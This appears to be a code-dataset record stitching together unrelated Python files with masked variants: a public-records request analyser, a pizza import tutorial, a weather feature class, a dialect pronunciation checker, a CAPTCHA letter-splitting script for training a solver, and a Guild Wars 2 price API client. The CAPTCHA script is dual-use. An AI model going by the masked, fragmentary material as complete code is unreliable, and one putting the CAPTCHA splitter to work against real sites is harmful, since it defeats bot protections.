openYears\n\t\t\tdaysOpen[opdP][dkey].append(prrID)\t\t\t\n\t\t\n\touts = open(outf,'w')\n\touts.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n\tallNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n\tallNDay = sorted(list(allNDaySet))\n\tfor nday in allNDay:\n\t\tif nday > 365:\n\t\t\tlbl = '> %d year' % (nday-1000)\n\t\telse:\n\t\t\tlbl = '%d' % nday\n\t\topdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n\t\tnonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n\t\t\t\n\t\touts.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl,len(opdList),len(nonList), opdList,nonList))\n\t\t\n\touts.close()\n\ndef getWebPages(prrTbl,outf):\n\t\n\touts = open(outf,'w')\n\touts.write('PRRID,OPD,Text\\n')\n\tnempty = 0\n\tnpdf = 0\n\tfor i,prrID in enumerate(sorted(prrTbl.keys())):\n\n\t\tprr = prrTbl[prrID]\n\t\tif prr['URL'] == '':\n\t\t\tnempty += 1\n\t\t\tcontinue\n\t\t\t\n\t\topdP = 'Police Department' in prr['dept']\n\t\t\n\t\turl = prr['URL']\n\t\tresponse = urllib.request.urlopen(url)\n\t\twebContentBytes = response.read()\n\t\twebContent = webContentBytes.decode(\"utf-8\")\n\t\tif webContent.find('pdf') != -1:\n\t\t\tprint('here')\n\t\t\tnpdf += 1\n\t\telse:\n\t\t\tcontinue\n\t\n\t\tif i % 100 == 0:\n\t\t\tprint(i,npdf,nempty)\n\t\t\t\n\t\t# outs.write('%s,%d,\"%s\"\\n' % (prrID,opdP,prr['text']))\n\touts.close()\n\tprint('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))\n\ndef loadPRRQuery(inf):\n\t\n\treader = csv.DictReader(open(inf))\n\tprrIDList = []\n\tfor i,entry in enumerate(reader):\n\t\t# Exhibit,PRRId\n\t\tprrIDList.append(entry['PRRId'].strip())\n\treturn prrIDList\n\t\t\ndef rptQry(qryList,outf):\n\touts = open(outf,'w')\n\touts.write('PRID,CreateDate,DaysOpen,Status\\n')\n\t\n\trunDate = datetime.datetime.today()\n\tfor prrID in qryList:\n\t\tprr = prr20Recent[prrID]\n\t\trecdDateTime = prr['createDate']\n\t\topenPeriod = runDate - recdDateTime\n\t\topenDays = openPeriod.days\n\t\touts.write('%s,%s,%d,%s\\n' % 
(prrID,prr['createDate'].date(),openDays,prr['status']))\n\t\t\n\touts.close()\n\t\n\t\nif __name__ == '__main__':\n\n\tdataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n\t\n\n\tstartDate = datetime.datetime(2017,1,1)\n\t\n\tcsvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n\t# prr20, deptTbl = bldIndexTblCSV(csvFile)\n\tprr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)\n\t\n\topenPRRFile = dataDir + 'openPRR_200831.csv'\n\trptOpenPRR(prr20Recent,openPRRFile)\n\n\tdeptFreqFile = dataDir + 'deptFreq2.csv'\n\trptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)\n\t\n\tcreateDateFile = dataDir + 'createDate_200831.csv'\n\tanlyzCreateDates(prr20Recent,createDateFile)\n\t\n\tclearDateDir = dataDir + 'deptClear_200831/'\n\tanlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)\n\t\n\topenOPDFile = dataDir + 'openOPD_200831.csv'\n\trptOpenPRR(prr20Recent,openOPDFile)\n\n\t\n\n", "step-ids": [ 10, 11, 13, 14, 16 ] }
[ 10, 11, 13, 14, 16 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(""" ----------导入模块中的所有函数----------""") make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') <|reserved_special_token_1|> from e19_pizza import * print(""" ----------导入模块中的所有函数----------""") make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') <|reserved_special_token_1|> from e19_pizza import * print("\n----------导入模块中的所有函数----------") # 由于导入了每个函数,可通过名称来调用每个函数,无需使用句点表示法 make_pizza(16, 'pepperoni') make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese') # 注意: # 使用并非自己编写的大型模块时,最好不要采用这种导入方法,如果模块中 # 有函数的名称与你的项目中使用的名称相同,可能导致意想不到的结果。 # Python可能遇到多个名称相同的函数或变量,进而覆盖函数,而不是分别导 # 入所有的函数。 # 最佳做法: # 导入需要使用的函数,或者导入整个模块并使用句点表示法。
flexible
{ "blob_id": "c54a046ebde1be94ec87061b4fba9e22bf0f4d0a", "index": 3508, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(\"\"\"\n----------导入模块中的所有函数----------\"\"\")\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n", "step-3": "from e19_pizza import *\nprint(\"\"\"\n----------导入模块中的所有函数----------\"\"\")\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n", "step-4": "from e19_pizza import *\n\nprint(\"\\n----------导入模块中的所有函数----------\")\n# 由于导入了每个函数,可通过名称来调用每个函数,无需使用句点表示法\n\nmake_pizza(16, 'pepperoni')\nmake_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')\n\n# 注意:\n# 使用并非自己编写的大型模块时,最好不要采用这种导入方法,如果模块中\n# 有函数的名称与你的项目中使用的名称相同,可能导致意想不到的结果。\n# Python可能遇到多个名称相同的函数或变量,进而覆盖函数,而不是分别导\n# 入所有的函数。\n\n# 最佳做法:\n# 导入需要使用的函数,或者导入整个模块并使用句点表示法。\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np from feature.features import Features class RealWorldFeatures(Features): def __init__(self): super().__init__('tsagkias/real_world_features') def _extract_features(self, df): # weather from http://www.dwd.de/DE/leistungen/klimadatendeutschland/klimadatendeutschland.html features = [ df['temp_ham'], df['temp_fra'], df['temp_ber'], df['hum_ham'], df['hum_fra'], df['hum_ber'], ] return np.vstack(features).T
normal
{ "blob_id": "f6b2e66379b483c6a573d34d73ae0d10de7315a3", "index": 6815, "step-1": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n <mask token>\n", "step-3": "<mask token>\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n features = [df['temp_ham'], df['temp_fra'], df['temp_ber'], df[\n 'hum_ham'], df['hum_fra'], df['hum_ber']]\n return np.vstack(features).T\n", "step-4": "import numpy as np\nfrom feature.features import Features\n\n\nclass RealWorldFeatures(Features):\n\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n features = [df['temp_ham'], df['temp_fra'], df['temp_ber'], df[\n 'hum_ham'], df['hum_fra'], df['hum_ber']]\n return np.vstack(features).T\n", "step-5": "import numpy as np\nfrom feature.features import Features\n\nclass RealWorldFeatures(Features):\n def __init__(self):\n super().__init__('tsagkias/real_world_features')\n\n def _extract_features(self, df):\n # weather from http://www.dwd.de/DE/leistungen/klimadatendeutschland/klimadatendeutschland.html\n\n features = [\n df['temp_ham'],\n df['temp_fra'],\n df['temp_ber'],\n df['hum_ham'],\n df['hum_fra'],\n df['hum_ber'],\n ]\n\n return np.vstack(features).T\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from datetime import datetime from iohelpers import lines_to_textfile from typing import Iterator, List, Sequence from zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations def missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms, hokprons: ZhTopolectPronunciations): all_hokkien = set() for word, syn_data in synonyms.all_words(): minnan = set(syn_data['Philippine-MN']) minnan.update(syn_data['Quanzhou']) minnan.update(syn_data['Xiamen']) for hokkien in minnan: banlamoe = hokkien.split(':') all_hokkien.add(banlamoe[0]) return words_missing_prons(all_hokkien, hokprons) def words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations): return [word for word in corpus if prons.pronunciation(word) is None and all(ord(char) > 255 for char in word)] if __name__ == '__main__': synonyms = ZhTopolectSynonyms.from_local_folder('../data/enwiktionary/module-zh-data-json/dial-syn') mp = MandarinPronunciations.from_local_json_file('../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json') missing_mandarin_prons = iter(words_missing_prons(synonyms.mandarin_words(), mp)) h = ZhTopolectPronunciations.from_local_json_folder('../data/enwiktionary/module-zh-data-json/nan-pron') missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator(synonyms, h)) today = datetime.today().strftime("%Y%m%d") lines_to_textfile(f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt', missing_hokkien_prons) lines_to_textfile(f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt', missing_mandarin_prons)
normal
{ "blob_id": "18366633489d905c96b0c30d65442bc2e2b188ea", "index": 4703, "step-1": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = 
ZhTopolectSynonyms.from_local_folder(\n '../data/enwiktionary/module-zh-data-json/dial-syn')\n mp = MandarinPronunciations.from_local_json_file(\n '../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.\n mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder(\n '../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator\n (synonyms, h))\n today = datetime.today().strftime('%Y%m%d')\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt',\n missing_hokkien_prons)\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt',\n missing_mandarin_prons)\n", "step-4": "from datetime import datetime\nfrom iohelpers import lines_to_textfile\nfrom typing import Iterator, List, Sequence\nfrom zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms,\n hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations\n ):\n return [word for word in corpus if prons.pronunciation(word) is None and\n all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = ZhTopolectSynonyms.from_local_folder(\n '../data/enwiktionary/module-zh-data-json/dial-syn')\n mp = MandarinPronunciations.from_local_json_file(\n '../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.\n 
mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder(\n '../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator\n (synonyms, h))\n today = datetime.today().strftime('%Y%m%d')\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt',\n missing_hokkien_prons)\n lines_to_textfile(\n f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt',\n missing_mandarin_prons)\n", "step-5": "from datetime import datetime\nfrom iohelpers import lines_to_textfile\nfrom typing import Iterator, List, Sequence\nfrom zhmodules import ZhTopolectSynonyms, MandarinPronunciations, ZhTopolectPronunciations\n\n\ndef missing_philippine_hokkien_words_generator(synonyms: ZhTopolectSynonyms, hokprons: ZhTopolectPronunciations):\n all_hokkien = set()\n for word, syn_data in synonyms.all_words():\n minnan = set(syn_data['Philippine-MN'])\n minnan.update(syn_data['Quanzhou'])\n minnan.update(syn_data['Xiamen'])\n\n for hokkien in minnan:\n banlamoe = hokkien.split(':')\n all_hokkien.add(banlamoe[0])\n\n return words_missing_prons(all_hokkien, hokprons)\n\n\ndef words_missing_prons(corpus: Sequence[str], prons: ZhTopolectPronunciations):\n return [word for word in corpus if prons.pronunciation(word) is None and all(ord(char) > 255 for char in word)]\n\n\nif __name__ == '__main__':\n synonyms = ZhTopolectSynonyms.from_local_folder('../data/enwiktionary/module-zh-data-json/dial-syn')\n\n mp = MandarinPronunciations.from_local_json_file('../data/enwiktionary/module-zh-data-json/combined-mandarin-pron.json')\n missing_mandarin_prons = iter(words_missing_prons(synonyms.mandarin_words(), mp))\n h = ZhTopolectPronunciations.from_local_json_folder('../data/enwiktionary/module-zh-data-json/nan-pron')\n missing_hokkien_prons = iter(missing_philippine_hokkien_words_generator(synonyms, h))\n\n today = datetime.today().strftime(\"%Y%m%d\")\n 
lines_to_textfile(f'../data/enwiktionary/words-search/missing-hokkien.{today}.txt', missing_hokkien_prons)\n lines_to_textfile(f'../data/enwiktionary/words-search/missing-mandarin.{today}.txt', missing_mandarin_prons)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 19 09:31:20 2021 @author: dclabby """ import os import cv2 import pickle from utils import locateLetterRegions # # Constants # sourceFolder = '/home/dclabby/Documents/Springboard/HDAIML_SEP/Semester03/MachineLearning/Project/solving_captchas_code_examples/solving_captchas_code_examples/generated_captcha_images/' # destFolder = './data/separateLetters' # trainRatio = 0.8 # proportion of data set that will be used for training & validation (i.e. 1 - testRatio) def extractLetters(sourceFolder, trainRatio=0.8, destFolder='./data/separateLetters'): """ Parameters ---------- sourceFolder : string DESCRIPTION. trainRatio : float, optional DESCRIPTION. The default is 0.8. destFolder : string, optional DESCRIPTION. The default is './data/separateLetters'. Returns ------- None. """ letterCounts = {} # Get a list of all the captcha images to be processed capImages = os.listdir(sourceFolder) # loop over the image paths nImages = len(capImages) # note: the original script uses all images for training (train/test split is implemented later, but test data is actually used for validation) # therefore, should make a train/test split here & keep the test data separate iSplit = int(nImages*trainRatio) trainTestSplit = [capImages[:iSplit], capImages[iSplit:]] # [train, test] # save the list of training and test data, so that test data can be identified later with open('trainTestSplit.dat', "wb") as f: pickle.dump(trainTestSplit, f) # with open('trainTestSplit.dat', "rb") as f: # trainTestSplit = pickle.load(f) nTrain = len(trainTestSplit[0]) for (iImage, capImage) in enumerate(trainTestSplit[0]):#enumerate(capImages): print('Processing image ' + str(iImage+1) + ' of ' + str(nTrain))#str(nImages)) # Separate the filename from its extension, and use filename as the captcha's label (i.e. 
"2A2X.png" -> "2A2X") capLabel = capImage.split('.')[0] # Load image # imageData = cv2.imread(sourceFolder + capImage) imageData = cv2.imread(os.path.join(sourceFolder, capImage)) #cv2.imshow(capLabel + ' - original', imageData) # Convert to grayscale imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY) #cv2.imshow(capLabel + ' - gray', imageData) # Add padding imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.BORDER_REPLICATE) #cv2.imshow(capLabel + ' - padding', imageData) # Locate letter regions letterRegions = locateLetterRegions(imageData) # If the number of contours does not equal the number of letters in the label it is concluded that letter extraction # was not successful, and this example will not be used in training data if len(letterRegions) != len(capLabel): continue # Save each letter as a separate image for letterRegion, letterLabel in zip(letterRegions, capLabel): # Get coordinates (x, y) and dimensions (w, h) of letter region x, y, w, h = letterRegion # extract the letter from the original image letterImage = imageData[y:y + h, x:x + w] # # extract the letter from the original image, with a 2 pixel margin # letterImage = imageData[y - 2:y + h + 2, x - 2:x + w + 2] # note: image data arranged with rows corresponding to the vertical (y), & columns corresponding to the horizontal (x) #cv2.imshow(letterLabel, letterImage) # define folder path where letters will be saved & create folder if it does not exist savePath = os.path.join(destFolder, letterLabel) if not os.path.exists(savePath): os.makedirs(savePath) # initialize or increment the letterCounts dictionary for the key corresponding to the present letter if letterLabel not in letterCounts: letterCounts[letterLabel] = 1 else: letterCounts[letterLabel] += 1 letterCount = letterCounts[letterLabel] # write the letter image to a file based on its letter count fileName = os.path.join(savePath, "{}.png".format(str(letterCount).zfill(6))) cv2.imwrite(fileName, letterImage)
normal
{ "blob_id": "6109efeb3462ac2c5a94a68fbfa4f2f0617dd927", "index": 1221, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder=\n './data/separateLetters'):\n \"\"\" \n\n Parameters\n ----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n letterCounts = {}\n capImages = os.listdir(sourceFolder)\n nImages = len(capImages)\n iSplit = int(nImages * trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]]\n with open('trainTestSplit.dat', 'wb') as f:\n pickle.dump(trainTestSplit, f)\n nTrain = len(trainTestSplit[0])\n for iImage, capImage in enumerate(trainTestSplit[0]):\n print('Processing image ' + str(iImage + 1) + ' of ' + str(nTrain))\n capLabel = capImage.split('.')[0]\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.\n BORDER_REPLICATE)\n letterRegions = locateLetterRegions(imageData)\n if len(letterRegions) != len(capLabel):\n continue\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n x, y, w, h = letterRegion\n letterImage = imageData[y:y + h, x:x + w]\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n fileName = os.path.join(savePath, '{}.png'.format(str(\n letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n", "step-3": "<mask token>\nimport os\nimport cv2\nimport pickle\nfrom utils import locateLetterRegions\n\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder=\n './data/separateLetters'):\n \"\"\" \n\n Parameters\n 
----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n letterCounts = {}\n capImages = os.listdir(sourceFolder)\n nImages = len(capImages)\n iSplit = int(nImages * trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]]\n with open('trainTestSplit.dat', 'wb') as f:\n pickle.dump(trainTestSplit, f)\n nTrain = len(trainTestSplit[0])\n for iImage, capImage in enumerate(trainTestSplit[0]):\n print('Processing image ' + str(iImage + 1) + ' of ' + str(nTrain))\n capLabel = capImage.split('.')[0]\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.\n BORDER_REPLICATE)\n letterRegions = locateLetterRegions(imageData)\n if len(letterRegions) != len(capLabel):\n continue\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n x, y, w, h = letterRegion\n letterImage = imageData[y:y + h, x:x + w]\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n fileName = os.path.join(savePath, '{}.png'.format(str(\n letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n", "step-4": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 19 09:31:20 2021\n\n@author: dclabby\n\"\"\"\nimport os\nimport cv2\nimport pickle\nfrom utils import locateLetterRegions\n\n# # Constants\n# sourceFolder = '/home/dclabby/Documents/Springboard/HDAIML_SEP/Semester03/MachineLearning/Project/solving_captchas_code_examples/solving_captchas_code_examples/generated_captcha_images/'\n# destFolder = './data/separateLetters'\n# 
trainRatio = 0.8 # proportion of data set that will be used for training & validation (i.e. 1 - testRatio)\n\ndef extractLetters(sourceFolder, trainRatio=0.8, destFolder='./data/separateLetters'):\n \"\"\" \n\n Parameters\n ----------\n sourceFolder : string\n DESCRIPTION.\n trainRatio : float, optional\n DESCRIPTION. The default is 0.8.\n destFolder : string, optional\n DESCRIPTION. The default is './data/separateLetters'.\n\n Returns\n -------\n None.\n\n \"\"\"\n \n letterCounts = {}\n \n # Get a list of all the captcha images to be processed\n capImages = os.listdir(sourceFolder)\n \n # loop over the image paths\n nImages = len(capImages) \n # note: the original script uses all images for training (train/test split is implemented later, but test data is actually used for validation)\n # therefore, should make a train/test split here & keep the test data separate\n iSplit = int(nImages*trainRatio)\n trainTestSplit = [capImages[:iSplit], capImages[iSplit:]] # [train, test]\n \n # save the list of training and test data, so that test data can be identified later\n with open('trainTestSplit.dat', \"wb\") as f:\n pickle.dump(trainTestSplit, f)\n # with open('trainTestSplit.dat', \"rb\") as f:\n # trainTestSplit = pickle.load(f)\n \n nTrain = len(trainTestSplit[0])\n for (iImage, capImage) in enumerate(trainTestSplit[0]):#enumerate(capImages):\n print('Processing image ' + str(iImage+1) + ' of ' + str(nTrain))#str(nImages))\n \n # Separate the filename from its extension, and use filename as the captcha's label (i.e. 
\"2A2X.png\" -> \"2A2X\")\n capLabel = capImage.split('.')[0]\n \n # Load image\n # imageData = cv2.imread(sourceFolder + capImage)\n imageData = cv2.imread(os.path.join(sourceFolder, capImage))\n #cv2.imshow(capLabel + ' - original', imageData)\n \n # Convert to grayscale\n imageData = cv2.cvtColor(imageData, cv2.COLOR_BGR2GRAY)\n #cv2.imshow(capLabel + ' - gray', imageData) \n \n # Add padding\n imageData = cv2.copyMakeBorder(imageData, 8, 8, 8, 8, cv2.BORDER_REPLICATE)\n #cv2.imshow(capLabel + ' - padding', imageData) \n \n # Locate letter regions\n letterRegions = locateLetterRegions(imageData)\n \n # If the number of contours does not equal the number of letters in the label it is concluded that letter extraction\n # was not successful, and this example will not be used in training data\n if len(letterRegions) != len(capLabel):\n continue\n \n # Save each letter as a separate image\n for letterRegion, letterLabel in zip(letterRegions, capLabel):\n # Get coordinates (x, y) and dimensions (w, h) of letter region\n x, y, w, h = letterRegion\n \n # extract the letter from the original image\n letterImage = imageData[y:y + h, x:x + w] \n # # extract the letter from the original image, with a 2 pixel margin\n # letterImage = imageData[y - 2:y + h + 2, x - 2:x + w + 2] # note: image data arranged with rows corresponding to the vertical (y), & columns corresponding to the horizontal (x) \n #cv2.imshow(letterLabel, letterImage) \n \n # define folder path where letters will be saved & create folder if it does not exist\n savePath = os.path.join(destFolder, letterLabel)\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n \n # initialize or increment the letterCounts dictionary for the key corresponding to the present letter\n if letterLabel not in letterCounts:\n letterCounts[letterLabel] = 1\n else:\n letterCounts[letterLabel] += 1\n letterCount = letterCounts[letterLabel]\n \n # write the letter image to a file based on its letter count\n fileName = 
os.path.join(savePath, \"{}.png\".format(str(letterCount).zfill(6)))\n cv2.imwrite(fileName, letterImage)\n \n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2012 - Samuel Loretan <tynril at gmail.com> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
import urllib2 try: import json except ImportError: import simplejson as json class Gw2Spidy: """This utility class allows easy access to the GW2Spidy data.""" headers = {'User-Agent': 'gw2spidy.py'} @staticmethod def getTypesList(): """Get a list of item types and subtypes.""" return Gw2Spidy._request('types')['results'] @staticmethod def getDisciplinesList(): """Get a list of crafting disciplines.""" return Gw2Spidy._request('disciplines')['results'] @staticmethod def getRaritiesList(): """Get a list of item rarities.""" return Gw2Spidy._request('rarities')['results'] @staticmethod def getAllItemsList(): """Get a list of all items.""" return Gw2Spidy._request('all-items', 'all')['results'] @staticmethod def getItemsOfType(typeId): """Get a list of all items of a certain type.""" return Gw2Spidy._request('all-items', str(typeId))['results'] @staticmethod def getItemData(itemId): """Get the data of a particular item. High frequency of update.""" return Gw2Spidy._request('item', str(itemId))['result'] @staticmethod def getItemBuyListings(itemId, allPages = False): """Get a list of all buy offers for a certain item.""" return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'buy') @staticmethod def getItemSellListings(itemId, allPages = False): """Get a list of all sell offers for a certain item.""" return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'sell') @staticmethod def searchItems(name, allPages = False): """Search items by name. 
Might be slow, not recommended.""" return Gw2Spidy._paginatedRequest(allPages, 'item-search', name) @staticmethod def getAllRecipesList(allPages = False): """Get a list of all crafting recipes.""" return Gw2Spidy._paginatedRequest(allPages, 'recipes', 'all') @staticmethod def getRecipesOfDiscipline(disciplineId, allPages = False): """Get a list of all crafting recipes for a certain discipline.""" return Gw2Spidy._paginatedRequest(allPages, 'recipes', str(disciplineId)) @staticmethod def getRecipeData(recipeId): """Get the data of a particular recipe.""" return Gw2Spidy._request('recipe', str(recipeId)) @staticmethod def getGemPrice(): """Get the current gem/gold conversion rate.""" return Gw2Spidy._request('gem-price') @staticmethod def _paginatedRequest(allPages, *args): """Handle paginated requests, downloading all pages if requested.""" data = [] currentPage = 0 while True: newData = Gw2Spidy._request(*(args + (str(currentPage),))) if not allPages: return newData['results'] data.extend(newData['results']) currentPage = currentPage + 1 if newData['page'] == newData['last_page']: break return data @staticmethod def _request(*args): """Makes a request on the GW2Spidy API.""" url = 'http://www.gw2spidy.com/api/v0.9/json/' + '/'.join(args) r = urllib2.Request(url, headers=Gw2Spidy.headers) if 'Cookie' not in Gw2Spidy.headers: resp = urllib2.urlopen(r) if 'set-cookie' in resp.headers: Gw2Spidy.headers['Cookie'] = resp.headers['set-cookie'].split(';', 1)[0] return json.loads(resp.read()) return json.loads(urllib2.urlopen(r).read())
normal
